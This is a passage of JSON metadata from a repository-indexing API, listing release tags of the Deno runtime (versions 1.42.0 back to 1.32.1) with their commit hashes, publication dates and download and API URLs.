url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub